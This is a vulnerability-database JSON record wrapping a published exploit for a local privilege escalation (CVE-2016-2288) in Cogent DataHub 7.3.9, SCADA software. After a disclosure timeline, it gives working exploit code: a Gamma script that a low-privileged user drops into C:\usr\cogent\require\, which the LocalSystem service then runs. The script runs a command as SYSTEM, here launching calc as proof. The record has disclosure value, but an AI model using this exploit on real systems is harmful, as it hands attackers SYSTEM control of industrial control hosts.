{"id": "EDB-ID:39630", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation", "description": "", "published": "2016-03-28T00:00:00", "modified": "2016-03-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/39630", "reporter": "mr_me", "references": [], "cvelist": ["2016-2288"], "immutableFields": [], "lastseen": "2022-08-16T08:20:50", "viewCount": 12, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2016-2288"]}, {"type": "ics", "idList": ["ICSA-16-084-01"]}]}, "exploitation": null, "vulnersScore": 0.3}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678808600}, "_internal": {"score_hash": "165b29bb6675773af419f32292a59bf5"}, "sourceHref": "https://www.exploit-db.com/download/39630", "sourceData": "/*\r\n\r\n# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability\r\n# Google Dork: lol\r\n# Date: 28/3/2016\r\n# Exploit Author: mr_me\r\n# Vendor Homepage: http://www.cogentdatahub.com/\r\n# Software Link: http://www.cogentdatahub.com/Contact_Form.html\r\n# Version: <= 7.3.9\r\n# Tested on: Windows 7 x86\r\n# CVE : CVE\u20112016-2288\r\n\r\nsha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe\r\nAdvsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01\r\n\r\nTimeline:\r\n=========\r\n- 02/12/2015 : vuln found, case opened to the zdi\r\n- 09/02/2016 : case rejected (not interested in this vuln due to vector)\r\n- 26/02/2016 : reported to ICS-CERT\r\n- 24/03/2016 : advisory released\r\n\r\nNotes:\r\n======\r\n- to reach SYSTEM, the service needs to be installed via the Service Manager\r\n- the service doesnt need to be installed, as long as 'C:\\Program Files\\Cogent\\Cogent DataHub\\CogentDataHubV7.exe' has been executed by a privileged user\r\n- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script\r\n\r\nExploitation:\r\n=============\r\n\r\nAs a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\\usr\\cogent\\require\\ and enjoy the free SYSTEM calcs. Most OS's dont allow\r\na write into c:\\ as guest, but we are in the SCADA world. Anything is possible.\r\n\r\nC:\\Users\\steven>sc qc \"Cogent DataHub\"\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: Cogent DataHub\r\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : \"C:\\Program Files\\Cogent\\Cogent DataHub\\CogentDataHubV7.exe\" -H \"C:\\Users\\steven\\AppData\\Roaming\\Cogent DataHub\"\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : Cogent DataHub\r\n DEPENDENCIES : RPCSS\r\n SERVICE_START_NAME : LocalSystem\r\n\r\nC:\\Users\\steven>\r\n*/\r\n\r\nrequire (\"Application\");\r\nrequire (\"AsyncRun\");\t\t\t\t// thanks to our friends @ Cogent\r\n\r\nclass WebstreamSupport Application\r\n{\r\n\r\n}\r\n\r\nmethod WebstreamSupport.constructor ()\r\n{\r\n\tRunCommandAsync(nil, nil, \"cmd.exe /c calc\", \"c:\\\\\");\r\n}\r\n\r\nWebstream = ApplicationSingleton (WebstreamSupport);", "osvdbidlist": [], "exploitType": "local", "verified": true}
Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation